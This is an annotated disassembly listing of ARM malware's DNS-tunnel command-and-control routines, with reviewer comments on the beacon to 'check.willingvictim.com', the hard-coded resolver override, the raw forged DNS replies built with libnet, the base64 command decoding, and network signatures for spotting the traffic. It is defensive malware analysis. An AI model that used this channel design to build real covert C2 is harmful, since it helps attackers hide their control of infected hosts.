.text:00010FB4 ;*     ns_rr at var_42C is never zeroed, so a reply without  *
.text:00010FB4 ;*     an answer RR leaves rr.rdata as stale stack data      *
.text:00010FB4 ;*   - snprintf maxlen is 0x400 but the buffer mainLoop      *
.text:00010FB4 ;*     passes down is calloc(0x200, 1): the bound does not   *
.text:00010FB4 ;*     protect the destination (in practice the source is    *
.text:00010FB4 ;*     the 0x200-byte zeroed answer buffer -- confirm)       *
.text:00010FB4 ;*   - detection: DNS TXT queries to 172.16.240.129 that     *
.text:00010FB4 ;*     bypass /etc/resolv.conf (nscount is overwritten)      *
.text:00010FB4 ;*************************************************************
.text:00010FB4
.text:00010FB4
.text:00010FB4 ; =============== S U B R O U T I N E =======================================
.text:00010FB4
.text:00010FB4
.text:00010FB4 send_packet_to_C_C                      ; CODE XREF: init_session_with_C2_server+14p
.text:00010FB4                                         ; InterpretAndExecuteCommand+14p
.text:00010FB4
.text:00010FB4 var_670         = -0x670                ; [SP,#0]: 5th arg slot (anslen for res_query)
.text:00010FB4 var_668         = -0x668                ; saved &s
.text:00010FB4 var_664         = -0x664                ; saved &ns_msg handle
.text:00010FB4 inp             = -0x660                ; struct in_addr for inet_aton
.text:00010FB4 var_65C         = -0x65C                ; ns_msg handle (0x30 bytes)
.text:00010FB4 s               = -0x62C                ; 0x200-byte DNS answer buffer
.text:00010FB4 var_42C         = -0x42C                ; ns_rr (0x414 bytes, name[1025] first)
.text:00010FB4 var_1C          = -0x1C                 ; = var_42C + 0x410: ns_rr.rdata
.text:00010FB4
.text:00010FB4                 STMFD   SP!, {R4-R7,LR}
.text:00010FB8                 SUB     SP, SP, #0x650
.text:00010FBC                 SUB     SP, SP, #0xC    ; frame = 0x65C + 0x14 saved regs = 0x670
.text:00010FC0                 MOV     R6, R1          ; R6 = host name to query
.text:00010FC4                 MOV     R7, R0          ; R7 = caller's output buffer
.text:00010FC8                 BL      res_init        ; populate _res, then override it below
.text:00010FCC                 LDR     R3, =aHello     ; "HELLO:" -- used only as base address 0x21E54 for .data reads
.text:00010FD0                 ADD     R1, SP, #0x670+inp ; inp
.text:00010FD4                 LDR     R0, [R3,#(dword_21E74 - 0x21E54)] ; 0x11C74 => '172.16.240.129' => non-routable address. Gnome one.
.text:00010FD8                 BL      inet_aton       ; return value ignored
.text:00010FDC                 BL      __res_state     ; R0 = &_res
.text:00010FE0                 LDR     R3, [SP,#0x670+inp]
.text:00010FE4                 MOV     R4, #1          ; R4 = 1, reused as nscount, class, section and return value
.text:00010FE8                 STR     R3, [R0,#0x14]  ; _res.nsaddr_list[0].sin_addr = 172.16.240.129 (offsets match musl's struct __res_state, nsaddr_list at +0x10 -- confirm)
.text:00010FEC                 BL      __res_state
.text:00010FF0                 MOV     R3, #2
.text:00010FF4                 STRH    R3, [R0,#0x10]  ; .sin_family = AF_INET
.text:00010FF8                 BL      __res_state
.text:00010FFC                 MOV     R5, R0
.text:00011000                 MOV     R0, #0x35       ; hostshort = 53
.text:00011004                 BL      htons           ; converts the unsigned short integer hostshort from host byte order to network byte order
.text:00011008                 STRH    R0, [R5,#0x12]  ; .sin_port = htons(53)
.text:0001100C                 BL      __res_state
.text:00011010                 MOV     R5, #0x200
.text:00011014                 ADD     R3, SP, #0x670+s
.text:00011018                 STR     R4, [R0,#0xC]   ; _res.nscount = 1: only the hard-coded server is used, resolv.conf is ignored
.text:0001101C                 MOV     R2, R5          ; n = 0x200
.text:00011020                 MOV     R0, R3          ; s
.text:00011024                 MOV     R1, #0          ; c
.text:00011028                 STR     R3, [SP,#0x670+var_668]
.text:0001102C                 BL      memset          ; zero the answer buffer
.text:00011030                 MOV     R1, R4          ; class = 1 (C_IN)
.text:00011034                 STR     R5, [SP,#0x670+var_670] ; anslen = 0x200 (5th arg, on the stack)
.text:00011038                 MOV     R0, R6          ; R6 = hostname to contact
.text:0001103C                 LDR     R3, [SP,#0x670+var_668] ; answer
.text:00011040                 MOV     R2, #0x10       ; type = 0x10 (T_TXT)
.text:00011044                 BL      res_query       ; ==> Send DNS packet to C&C server
.text:00011048                 SUBS    R1, R0, #0      ; R1 = answer length
.text:0001104C                 BLE     error           ; <= 0: failure or empty reply
.text:00011050                 ADD     R3, SP, #0x670+var_65C ; handle to parsed answer
.text:00011054                 MOV     R2, R3
.text:00011058                 LDR     R0, [SP,#0x670+var_668] ; response message buffer
.text:0001105C                 STR     R3, [SP,#0x670+var_664]
.text:00011060                 BL      ns_initparse    ; init name server library (return value not checked)
.text:00011064                 ADD     R3, SP, #0x670+var_42C ; &rr -- never initialised
.text:00011068                 MOV     R2, #0          ; rrnum = 0
.text:0001106C                 MOV     R1, R4          ; section = 1 (ns_s_an)
.text:00011070                 LDR     R0, [SP,#0x670+var_664] ; &handle
.text:00011074                 BL      ns_parserr      ; return value not checked
.text:00011078                 LDR     R3, [SP,#0x670+var_1C] ; rr.rdata (stale stack data if ns_parserr failed)
.text:0001107C                 MOV     R0, R7          ; s
.text:00011080                 ADD     R3, R3, R4      ; rdata + 1: skip the TXT <character-string> length byte
.text:00011084                 LDR     R2, =(aCSCCCCCCCCCCCC+0x28) ; format -- "%s", the tail of the long format string
.text:00011088                 MOV     R1, #0x400      ; maxlen -- larger than mainLoop's 0x200-byte destination
.text:0001108C                 BL      snprintf        ; relies on a NUL somewhere after rdata (answer buffer was zeroed)
.text:00011090                 MOV     R0, R4          ; return 1
.text:00011094
.text:00011094 return                                  ; CODE XREF: send_packet_to_C_C+F0j
.text:00011094                 ADD     SP, SP, #0x650
.text:00011098                 ADD     SP, SP, #0xC
.text:0001109C                 LDMFD   SP!, {R4-R7,PC}
.text:000110A0 ; ---------------------------------------------------------------------------
.text:000110A0
.text:000110A0 error                                   ; CODE XREF: send_packet_to_C_C+98j
.text:000110A0                 MOV     R0, #0xFFFFFFFF ; return -1
.text:000110A4                 B       return
.text:000110A4 ; End of function send_packet_to_C_C
.text:000110A4
.text:000110A4 ; ---------------------------------------------------------------------------
.text:000110A8 off_110A8       DCD aHello              ; DATA XREF: send_packet_to_C_C+18r
.text:000110A8                                         ; "HELLO:"
.text:000110AC ; char *off_110AC
.text:000110AC off_110AC       DCD aCSCCCCCCCCCCCC+0x28 ; DATA XREF: send_packet_to_C_C+D0r
.text:000110AC                                         ; "%s"
.text:000110B0
.text:000110B0 ; =============== S U B R O U T I N E =======================================
.text:000110B0
.text:000110B0 ;*************************************************************
.text:000110B0 ;*  buildAndSendDNSPacket                                    *
.text:000110B0 ;*************************************************************
.text:000110B0 ;* DESCRIPTION : upstream C2 channel.  Builds ONE raw        *
.text:000110B0 ;*   IPv4/UDP packet with libnet that looks like a DNS       *
.text:000110B0 ;*   *response* (flags 0x8180, id 0x1337) from port 53 to    *
.text:000110B0 ;*   port 0x6666 at the host named by R1.  Per the stack     *
.text:000110B0 ;*   slots set up before the snprintf, the payload is one    *
.text:000110B0 ;*   question "<R2> TXT IN" followed by one TXT answer       *
.text:000110B0 ;*   (name pointer C0 0C, TTL 5) whose text is R0.           *
.text:000110B0 ;*                                                           *
.text:000110B0 ;* INPUT  :                                                  *
.text:000110B0 ;*   R0 = text to carry in the TXT answer (kept in R8)       *
.text:000110B0 ;*   R1 = destination host name, resolved with              *
.text:000110B0 ;*        libnet_name2addr4 (kept in R4 until resolved)      *
.text:000110B0 ;*   R2 = name placed in the question section (kept in R11)  *
.text:000110B0 ;*                                                           *
.text:000110B0 ;* RETURN : R0 = 0 on success, 1 if the DNS or UDP pblock    *
.text:000110B0 ;*   could not be built; exit(1) if libnet_init or the IPv4  *
.text:000110B0 ;*   pblock fails (the IPv4 path exits without               *
.text:000110B0 ;*   libnet_destroy -- inconsistent with the other errors).  *
.text:000110B0 ;*                                                           *
.text:000110B0 ;* NOTES  : needs root / CAP_NET_RAW for LIBNET_RAW4.  The   *
.text:000110B0 ;*   libnet_write result is not checked.  Detection: UDP     *
.text:000110B0 ;*   from sport 53 to dport 0x6666 carrying a DNS reply with *
.text:000110B0 ;*   id 0x1337, IP id 0xF2, TTL 64, that answers a query     *
.text:000110B0 ;*   the receiver never sent.                                *
.text:000110B0 ;*************************************************************
.text:000110B0
.text:000110B0 buildAndSendDNSPacket                   ; CODE XREF: sendShortReplyTo_C2_Server+20p
.text:000110B0                                         ; sendLargeReplyTo_C2_server+78p
.text:000110B0
.text:000110B0 var_580         = -0x580                ; [SP,#0x00] 5th argument slot (AAPCS)
.text:000110B0 var_57C         = -0x57C                ; [SP,#0x04] 6th
.text:000110B0 var_578         = -0x578                ; [SP,#0x08] 7th
.text:000110B0 var_574         = -0x574                ; [SP,#0x0C] 8th
.text:000110B0 var_570         = -0x570                ; [SP,#0x10] 9th
.text:000110B0 var_56C         = -0x56C                ; [SP,#0x14] 10th
.text:000110B0 var_568         = -0x568                ; [SP,#0x18] 11th
.text:000110B0 var_564         = -0x564                ; [SP,#0x1C] 12th
.text:000110B0 var_560         = -0x560                ; [SP,#0x20] 13th
.text:000110B0 var_55C         = -0x55C
.text:000110B0 var_558         = -0x558
.text:000110B0 var_554         = -0x554
.text:000110B0 var_550         = -0x550
.text:000110B0 var_54C         = -0x54C
.text:000110B0 var_548         = -0x548
.text:000110B0 var_544         = -0x544
.text:000110B0 var_540         = -0x540
.text:000110B0 var_53C         = -0x53C
.text:000110B0 var_538         = -0x538
.text:000110B0 var_534         = -0x534                ; last snprintf vararg
.text:000110B0 var_52C         = -0x52C                ; local IPv4 address (libnet_get_ipaddr4)
.text:000110B0 var_528         = -0x528                ; libnet err_buf
.text:000110B0 s               = -0x428                ; 0x400-byte DNS payload buffer
.text:000110B0
.text:000110B0                 STMFD   SP!, {R4-R11,LR}
.text:000110B4                 SUB     SP, SP, #0x550
.text:000110B8                 SUB     SP, SP, #0xC    ; frame = 0x55C + 0x24 saved regs = 0x580
.text:000110BC                 MOV     R8, R0          ; R8 = TXT answer text (arg in R0)
.text:000110C0                 MOV     R4, R1          ; R4 = destination host name (arg in R1)
.text:000110C4                 MOV     R11, R2         ; R11 = question name (arg in R2)
.text:000110C8                 MOV     R1, #0          ; device = NULL
.text:000110CC                 ADD     R2, SP, #0x580+var_528 ; err_buf
.text:000110D0                 MOV     R0, #1          ; injection_type = 1 (LIBNET_RAW4: needs root / CAP_NET_RAW)
.text:000110D4                 BL      libnet_init
.text:000110D8                 SUBS    R5, R0, #0      ; R5 = libnet context
.text:000110DC                 BEQ     errorLibnet_init
.text:000110E0                 BL      libnet_get_ipaddr4 ; local IPv4 address of the context
.text:000110E4                 MOV     R1, R4          ; hostname = arg1
.text:000110E8                 MOV     R2, #1          ; LIBNET_RESOLVE
.text:000110EC                 STR     R0, [SP,#0x580+var_52C] ; local IPv4 address, used as the IP source below (not the context)
.text:000110F0                 MOV     R0, R5
.text:000110F4                 BL      libnet_name2addr4
.text:000110F8                 MOV     R10, R0         ; R10 = IP address of host name received in arg1
.text:000110FC                 MOV     R0, R8          ; s
.text:00011100                 BL      strlen          ; strlen(R8) = length of the TXT text
.text:00011104                 MOV     R7, R0
.text:00011108                 MOV     R0, R11         ; s
.text:0001110C                 BL      strlen          ; strlen(R11) = length of the question label
.text:00011110                 MOV     R6, #1
.text:00011114                 MOV     R2, #0x10
.text:00011118                 MOV     R4, #0          ; R4 = 0 from here on (many zero args + return value)
.text:0001111C                 MOV     R9, #0xC
.text:00011120                 MOV     R1, #0xC0
.text:00011124                 MOV     R12, #5
.text:00011128 ; snprintf vararg set-up.  With R3 as the first vararg and the stack slots
.text:00011128 ; in AAPCS order (var_580, var_57C, ...), the "%c%s%c%c..." format
.text:00011128 ; serialises, byte for byte:
.text:00011128 ;   <len(R11)> R11 00         -- question name (single label)
.text:00011128 ;   00 10  00 01              -- QTYPE TXT, QCLASS IN
.text:00011128 ;   C0 0C  00 10  00 01       -- answer: pointer to the name, TXT, IN
.text:00011128 ;   00 00 00 05               -- TTL 5
.text:00011128 ;   00 <len(R8)+1>            -- RDLENGTH
.text:00011128 ;   <len(R8)> R8              -- TXT <character-string>
.text:00011128 ; %c with value 0 writes a NUL, which is fine because the length used
.text:00011128 ; later is snprintf's return value, not strlen of the buffer.
.text:00011128                 STR     R2, [SP,#0x580+var_55C] ; 0x10: answer TYPE
.text:0001112C                 STR     R2, [SP,#0x580+var_574] ; 0x10: question QTYPE
.text:00011130                 ADD     R2, R7, R6      ; R2 = strlen(R8)+1 = RDLENGTH
.text:00011134                 STR     R11, [SP,#0x580+var_580] ; question label string (the %s)
.text:00011138                 UXTB    R2, R2
.text:0001113C                 ADD     R11, SP, #0x580+s ; R11 = payload buffer from here on
.text:00011140                 UXTB    R3, R0          ; first %c: label length byte
.text:00011144                 UXTB    R7, R7
.text:00011148                 STR     R1, [SP,#0x580+var_568] ; 0xC0: compression pointer high byte
.text:0001114C                 STR     R2, [SP,#0x580+var_53C] ; RDLENGTH low byte => 53C
.text:00011150                 MOV     R1, #0x400      ; maxlen
.text:00011154                 LDR     R2, =aCSCCCCCCCCCCCC ; "%c%s%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%"...
.text:00011158                 STR     R4, [SP,#0x580+var_560] ; 0 => 0x560
.text:0001115C                 STR     R4, [SP,#0x580+var_570] ; 0 => 0x570
.text:00011160                 STR     R4, [SP,#0x580+var_578] ; 0 => 0x578
.text:00011164                 STR     R4, [SP,#0x580+var_57C] ; 0 => 0x57C (label terminator)
.text:00011168                 STR     R6, [SP,#0x580+var_56C] ; 1: QCLASS IN
.text:0001116C                 STR     R9, [SP,#0x580+var_564] ; 0x0C: compression pointer low byte
.text:00011170                 MOV     R0, R11         ; s
.text:00011174                 STR     R7, [SP,#0x580+var_538] ; TXT string length byte
.text:00011178                 STR     R12, [SP,#0x580+var_544] ; 5: TTL low byte
.text:0001117C                 STR     R8, [SP,#0x580+var_534] ; TXT text (the last %s)
.text:00011180                 STR     R4, [SP,#0x580+var_540] ; 0 => 0x540
.text:00011184                 STR     R4, [SP,#0x580+var_548] ; 0 => 0x548
.text:00011188                 STR     R4, [SP,#0x580+var_54C] ; 0 => 0x54C
.text:0001118C                 STR     R4, [SP,#0x580+var_550] ; 0 => 0x550
.text:00011190                 STR     R4, [SP,#0x580+var_558] ; 0 => 0x558
.text:00011194                 STR     R6, [SP,#0x580+var_554] ; 1: answer CLASS IN
.text:00011198                 BL      snprintf
.text:0001119C                 UXTH    R7, R0          ; R7 = bytes written = DNS payload length
.text:000111A0                 STR     R7, [SP,#0x580+var_570] ; payload_s
.text:000111A4                 STR     R4, [SP,#0x580+var_568] ; ptag = 0 (new pblock)
.text:000111A8                 STR     R11, [SP,#0x580+var_574] ; payload = s
.text:000111AC                 STR     R4, [SP,#0x580+var_578] ; num_addi_rr = 0
.text:000111B0                 STR     R4, [SP,#0x580+var_57C] ; num_auth_rr = 0 (the answer count is the slot below)
.text:000111B4                 STR     R6, [SP,#0x580+var_580] ; num_anws_rr = 1 (5th arg, [SP,#0])
.text:000111B8                 MOV     R0, R9          ; h_len = 0xC (DNS header without length prefix)
.text:000111BC                 STR     R5, [SP,#0x580+var_56C] ; l = libnet context
.text:000111C0                 MOV     R3, R6          ; number of question = 1
.text:000111C4                 LDR     R2, =0x8180     ; flags: QR=1 RD=1 RA=1 -- a standard response, not a query
.text:000111C8                 LDR     R1, =0x1337     ; fixed transaction id: reliable network signature
.text:000111CC                 BL      libnet_build_dnsv4
.text:000111D0                 CMN     R0, #1          ; -1 => error
.text:000111D4                 BEQ     printDNSErrorOnStderr
.text:000111D8                 ADD     R2, R7, #0x14   ; len = 8 (UDP hdr) + 0xC (DNS hdr) + payload
.text:000111DC                 STR     R4, [SP,#0x580+var_574] ; ptag = 0
.text:000111E0                 STMFA   SP, {R4,R5}     ; STMIB, no writeback: [SP,#4] = payload_s = 0, [SP,#8] = l
.text:000111E4                 STR     R4, [SP,#0x580+var_580] ; payload = NULL (already in the DNS pblock)
.text:000111E8                 UXTH    R2, R2
.text:000111EC                 MOV     R3, R4          ; sum = 0 (libnet fills in the checksum)
.text:000111F0                 LDR     R1, =0x6666     ; dp = 0x6666 (26214)
.text:000111F4                 MOV     R0, #0x35       ; sp = 53: the forged reply appears to come from a DNS server
.text:000111F8                 BL      libnet_build_udp
.text:000111FC                 CMN     R0, #1
.text:00011200                 BEQ     printUDPErrorOnStdErr
.text:00011204                 MOV     R2, #0x11       ; prot = 0x11 (IPPROTO_UDP)
.text:00011208                 MOV     R3, #0x40       ; ttl = 64
.text:0001120C                 LDR     R1, [SP,#0x580+var_52C] ; local IPv4 address
.text:00011210                 ADD     R0, R7, #0x28   ; ip_len = 20 (IP) + 8 (UDP) + 0xC (DNS) + payload
.text:00011214                 STR     R1, [SP,#0x580+var_574] ; src
.text:00011218                 STMFA   SP, {R2,R4}     ; [SP,#4] = prot, [SP,#8] = sum = 0
.text:0001121C                 STR     R3, [SP,#0x580+var_580] ; ttl (5th arg)
.text:00011220                 UXTH    R0, R0
.text:00011224                 STR     R4, [SP,#0x580+var_560] ; ptag = 0
.text:00011228                 STR     R5, [SP,#0x580+var_564] ; libnet context => var_564
.text:0001122C                 STR     R4, [SP,#0x580+var_568] ; payload_s = 0
.text:00011230                 STR     R4, [SP,#0x580+var_56C] ; payload = NULL
.text:00011234                 STR     R10, [SP,#0x580+var_570] ; dst = IP address resolved from the host name in arg1
.text:00011238                 MOV     R3, R4          ; frag = 0
.text:0001123C                 MOV     R2, #0xF2       ; IP identification number = 0xF2 (constant: another signature)
.text:00011240                 MOV     R1, R4          ; tos=0
.text:00011244                 BL      libnet_build_ipv4 ; build an IPv4 header (..., payload=NULL, payload_s=0, ...)
.text:00011248                 CMN     R0, #1
.text:0001124C                 BEQ     IPHeaderBuildError
.text:00011250                 MOV     R0, R5
.text:00011254                 BL      libnet_write    ; inject the packet; result not checked
.text:00011258                 MOV     R0, R5
.text:0001125C                 BL      libnet_destroy
.text:00011260                 MOV     R0, R4          ; return 0
.text:00011264                 ADD     SP, SP, #0x550
.text:00011268                 ADD     SP, SP, #0xC
.text:0001126C                 LDMFD   SP!, {R4-R11,PC}
.text:00011270 ; ---------------------------------------------------------------------------
.text:00011270
.text:00011270 printDNSErrorOnStderr                   ; CODE XREF: buildAndSendDNSPacket+124j
.text:00011270                 LDR     R3, =__bss_start ; stderr
.text:00011274                 MOV     R0, R5
.text:00011278                 LDR     R4, [R3]
.text:0001127C                 BL      libnet_geterror
.text:00011280                 LDR     R1, =aCanTBuildDnsPa ; "Can't build DNS packet: %s\n"
.text:00011284                 MOV     R2, R0
.text:00011288                 MOV     R0, R4          ; stream
.text:0001128C                 BL      fprintf
.text:00011290
.text:00011290 return                                  ; CODE XREF: buildAndSendDNSPacket+218j
.text:00011290                 MOV     R0, R5
.text:00011294                 BL      libnet_destroy  ; shared failure exit: release the context, return 1
.text:00011298                 MOV     R0, #1
.text:0001129C                 ADD     SP, SP, #0x550
.text:000112A0                 ADD     SP, SP, #0xC
.text:000112A4                 LDMFD   SP!, {R4-R11,PC}
.text:000112A8 ; ---------------------------------------------------------------------------
.text:000112A8
.text:000112A8 printUDPErrorOnStdErr                   ; CODE XREF: buildAndSendDNSPacket+150j
.text:000112A8                 LDR     R3, =__bss_start ; stderr
.text:000112AC                 MOV     R0, R5
.text:000112B0                 LDR     R4, [R3]
.text:000112B4                 BL      libnet_geterror
.text:000112B8                 LDR     R1, =aCanTBuildUdpHe ; "Can't build UDP header: %s\n"
.text:000112BC                 MOV     R2, R0
.text:000112C0                 MOV     R0, R4          ; stream
.text:000112C4                 BL      fprintf
.text:000112C8                 B       return
.text:000112CC ; ---------------------------------------------------------------------------
.text:000112CC
.text:000112CC errorLibnet_init                        ; CODE XREF: buildAndSendDNSPacket+2Cj
.text:000112CC                 LDR     R3, =__bss_start ; stderr
.text:000112D0                 ADD     R2, SP, #0x580+var_528 ; err_buf filled by libnet_init
.text:000112D4                 LDR     R0, [R3]        ; stream
.text:000112D8                 LDR     R1, =aLibnet_initS ; "libnet_init: %s"
.text:000112DC                 BL      fprintf
.text:000112E0                 MOV     R0, #1          ; status
.text:000112E4                 BL      exit            ; whole process dies (typical when not root)
.text:000112E8 ; ---------------------------------------------------------------------------
.text:000112E8
.text:000112E8 IPHeaderBuildError                      ; CODE XREF: buildAndSendDNSPacket+19Cj
.text:000112E8                 LDR     R3, =__bss_start ; stderr
.text:000112EC                 MOV     R0, R5
.text:000112F0                 LDR     R4, [R3]
.text:000112F4                 BL      libnet_geterror
.text:000112F8                 LDR     R1, =aCanTBuildIpHea ; "Can't build IP header: %s\n"
.text:000112FC                 MOV     R2, R0
.text:00011300                 MOV     R0, R4          ; stream
.text:00011304                 BL      fprintf
.text:00011308                 MOV     R0, R6          ; status = 1
.text:0001130C                 BL      exit            ; unlike the DNS/UDP errors, no libnet_destroy and no return to the caller
.text:0001130C ; End of function buildAndSendDNSPacket
.text:0001130C
.text:0001130C ; ---------------------------------------------------------------------------
.text:00011310 ; char *off_11310
.text:00011310 off_11310       DCD aCSCCCCCCCCCCCC     ; DATA XREF: buildAndSendDNSPacket+A4r
.text:00011310                                         ; "%c%s%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%"...
.text:00011314 dword_11314     DCD 0x8180              ; DATA XREF: buildAndSendDNSPacket+114r
.text:00011318 dword_11318     DCD 0x1337              ; DATA XREF: buildAndSendDNSPacket+118r
.text:0001131C dword_1131C     DCD 0x6666              ; DATA XREF: buildAndSendDNSPacket+140r
.text:00011320 off_11320       DCD __bss_start         ; DATA XREF: buildAndSendDNSPacket:printDNSErrorOnStderrr
.text:00011320                                         ; buildAndSendDNSPacket:printUDPErrorOnStdErrr ...
.text:00011324 ; char *off_11324
.text:00011324 off_11324       DCD aCanTBuildDnsPa     ; DATA XREF: buildAndSendDNSPacket+1D0r
.text:00011324                                         ; "Can't build DNS packet: %s\n"
.text:00011328 ; char *off_11328
.text:00011328 off_11328       DCD aCanTBuildUdpHe     ; DATA XREF: buildAndSendDNSPacket+208r
.text:00011328                                         ; "Can't build UDP header: %s\n"
.text:0001132C ; char *off_1132C
.text:0001132C off_1132C       DCD aLibnet_initS       ; DATA XREF: buildAndSendDNSPacket+228r
.text:0001132C                                         ; "libnet_init: %s"
.text:00011330 ; char *off_11330
.text:00011330 off_11330       DCD aCanTBuildIpHea     ; DATA XREF: buildAndSendDNSPacket+248r
.text:00011330                                         ; "Can't build IP header: %s\n"
.text:00011334
.text:00011334 ; =============== S U B R O U T I N E =======================================
.text:00011334
.text:00011334 ; Base64 decoded-length helper (calcDecodeLength in the usual OpenSSL
.text:00011334 ; BIO example).  n = strlen(s); pad = 0, or 1 if s[n-1] == '=', or 2 if
.text:00011334 ; s[n-2] == '=' as well; returns (n*3)/4 - pad.
.text:00011334 ; Input : R0 = NUL-terminated base64 string
.text:00011334 ; Output: R0 = expected decoded length
.text:00011334 ; Note  : an empty string reads s[-1] (LDRB at R3-1 with R3 = s) --
.text:00011334 ;         out-of-bounds read in the sample; only the multiply/shift is
.text:00011334 ;         used for length, so the result is 0 in that case anyway.
.text:00011334 sub_11334                               ; CODE XREF: base64_decode+10p
.text:00011334                 STMFD   SP!, {R4,LR}
.text:00011338                 MOV     R4, R0
.text:0001133C                 BL      strlen
.text:00011340                 ADD     R3, R4, R0      ; R3 = s + n
.text:00011344                 LDRB    R2, [R3,#-1]    ; last character
.text:00011348                 CMP     R2, #0x3D       ; '='
.text:0001134C                 MOVNE   R3, #0          ; no padding
.text:00011350                 BEQ     loc_11360
.text:00011354
.text:00011354 loc_11354                               ; CODE XREF: sub_11334+3Cj
.text:00011354                 ADD     R0, R0, R0,LSL#1 ; R0 = n * 3
.text:00011358                 RSB     R0, R3, R0,LSR#2 ; R0 = (n*3)/4 - pad
.text:0001135C                 LDMFD   SP!, {R4,PC}
.text:00011360 ; ---------------------------------------------------------------------------
.text:00011360
.text:00011360 loc_11360                               ; CODE XREF: sub_11334+1Cj
.text:00011360                 LDRB    R3, [R3,#-2]    ; second-to-last character
.text:00011364                 CMP     R3, #0x3D       ; '='
.text:00011368                 MOVEQ   R3, #2          ; "==" padding
.text:0001136C                 MOVNE   R3, #1          ; "=" padding
.text:00011370                 B       loc_11354
.text:00011370 ; End of function sub_11334
.text:00011370
.text:00011374
.text:00011374 ; =============== S U B R O U T I N E =======================================
.text:00011374
.text:00011374 ; int base64_decode(const char *in, char **out, int *length)
.text:00011374 ; Decodes the base64 text received over DNS with OpenSSL's BIO_f_base64.
.text:00011374 ;   R0 = input string (R7)
.text:00011374 ;   R1 = *out receives a malloc'd, NUL-terminated buffer (R6)
.text:00011374 ;   R2 = *length receives the BIO_read byte count (R8)
.text:00011374 ; Returns 0.  Fails hard through __assert_fail ("*length == decodeLen",
.text:00011374 ; client.c:0x1CB) if BIO_read returned a different length than
.text:00011374 ; sub_11334 predicted -- so malformed C2 input crashes the client rather
.text:00011374 ; than being rejected.  The malloc result is not checked.  The assert
.text:00011374 ; strings ("client.c", line 0x1CB) are useful for attribution/yara.
.text:00011374 base64_decode                           ; CODE XREF: init_session_with_C2_server+24p
.text:00011374                                         ; InterpretAndExecuteCommand+38p
.text:00011374                 STMFD   SP!, {R4-R8,LR}
.text:00011378                 MOV     R6, R1          ; R6 = out
.text:0001137C                 MOV     R8, R2          ; R8 = length
.text:00011380                 MOV     R7, R0          ; R7 = in
.text:00011384                 BL      sub_11334       ; decodeLen
.text:00011388                 MOV     R4, R0
.text:0001138C                 ADD     R0, R0, #1      ; size = decodeLen + 1
.text:00011390                 BL      malloc          ; not NULL-checked
.text:00011394                 MOV     R2, #0
.text:00011398                 MOV     R3, R0
.text:0001139C                 MOV     R1, #0xFFFFFFFF ; len = -1: BIO_new_mem_buf uses strlen(in)
.text:000113A0                 STRB    R2, [R3,R4]     ; buf[decodeLen] = 0 (terminator for the later strstr)
.text:000113A4                 STR     R0, [R6]        ; *out = buf
.text:000113A8                 MOV     R0, R7
.text:000113AC                 BL      BIO_new_mem_buf
.text:000113B0                 MOV     R5, R0          ; R5 = memory BIO
.text:000113B4                 BL      BIO_f_base64
.text:000113B8                 BL      BIO_new         ; base64 filter BIO
.text:000113BC                 MOV     R1, R5
.text:000113C0                 BL      BIO_push        ; b64 -> mem
.text:000113C4                 MOV     R1, #0x100      ; BIO_FLAGS_BASE64_NO_NL: single-line input
.text:000113C8                 MOV     R5, R0          ; R5 = chain head
.text:000113CC                 BL      BIO_set_flags
.text:000113D0                 MOV     R0, R7          ; s
.text:000113D4                 BL      strlen
.text:000113D8                 LDR     R1, [R6]        ; buf
.text:000113DC                 MOV     R2, R0          ; len = strlen(in) (an upper bound; buffer only holds decodeLen+1)
.text:000113E0                 MOV     R0, R5
.text:000113E4                 BL      BIO_read
.text:000113E8                 CMP     R4, R0          ; decodeLen == bytes read?
.text:000113EC                 STR     R0, [R8]        ; *length = bytes read
.text:000113F0                 BEQ     return
.text:000113F4                 LDR     R3, =aBase64decode ; "Base64Decode"
.text:000113F8                 LDR     R2, =0x1CB      ; line
.text:000113FC                 LDR     R1, =aClient_c  ; "client.c"
.text:00011400                 LDR     R0, =aLengthDecodele ; "*length == decodeLen"
.text:00011404                 BL      __assert_fail   ; abort on any length mismatch
.text:00011408 ; ---------------------------------------------------------------------------
.text:00011408
.text:00011408 return                                  ; CODE XREF: base64_decode+7Cj
.text:00011408                 MOV     R0, R5
.text:0001140C                 BL      BIO_free_all
.text:00011410                 MOV     R0, #0          ; always 0 when it returns
.text:00011414                 LDMFD   SP!, {R4-R8,PC}
.text:00011414 ; End of function base64_decode
.text:00011414
.text:00011414 ; ---------------------------------------------------------------------------
.text:00011418 ; char *function
.text:00011418 function        DCD aBase64decode       ; DATA XREF: base64_decode+80r
.text:00011418                                         ; "Base64Decode"
.text:0001141C ; unsigned int line
.text:0001141C line            DCD 0x1CB               ; DATA XREF: base64_decode+84r
.text:00011420 ; char *file
.text:00011420 file            DCD aClient_c           ; DATA XREF: base64_decode+88r
.text:00011420                                         ; "client.c"
.text:00011424 ; char *assertion
.text:00011424 assertion       DCD aLengthDecodele     ; DATA XREF: base64_decode+8Cr
.text:00011424                                         ; "*length == decodeLen"
.text:00011428
.text:00011428
.text:00011428
.text:00011428
.text:00011428 ;************************************************************
.text:00011428 ;* init_session_with_C2_server                              *
.text:00011428 ;************************************************************
.text:00011428 ;* DESCRIPTION : send a DNS request with name               *
.text:00011428 ;*               "check.willingvictim.com" to resolve and   *
.text:00011428 ;*               check that answer is "HELLO:" command.     *
.text:00011428 ;*                                                          *
.text:00011428 ;* INPUT :                                                  *
.text:00011428 ;*     R0 = buffer for answer                               *
.text:00011428 ;*                                                          *
.text:00011428 ;* RETURN : R0=1 if OK, -1 if not.                          *
.text:00011428 ;************************************************************
.text:00011428 ; Reviewer notes (grounded in the code below):
.text:00011428 ;  - the return value of send_packet_to_C_C is not checked here
.text:00011428 ;    (InterpretAndExecuteCommand does check it against 1);
.text:00011428 ;  - the buffer that base64_decode stores at [SP,#var_10] is never
.text:00011428 ;    freed, so each beacon attempt leaks one allocation;
.text:00011428 ;  - on the success path R0 is simply the getCommandID result (1).
.text:00011428 ; Detection: the beacon is a DNS lookup of "check.willingvictim.com";
.text:00011428 ; the answer is expected to be base64 text classified as "HELLO:".
.text:00011428
.text:00011428 ; =============== S U B R O U T I N E =======================================
.text:00011428
.text:00011428
.text:00011428 init_session_with_C2_server             ; CODE XREF: mainLoop+24p
.text:00011428
.text:00011428 var_10          = -0x10                 ; char  *decoded      (set by base64_decode)
.text:00011428 var_C           = -0xC                  ; size_t decoded_len  (set by base64_decode)
.text:00011428
.text:00011428                 STMFD   SP!, {R4,LR}
.text:0001142C                 MOV     R4, R0                  ; R4 = answer buffer
.text:00011430                 LDR     R3, =aHello             ; R3 = &aHello (0x21E54 in .data); neighbours addressed relative to it
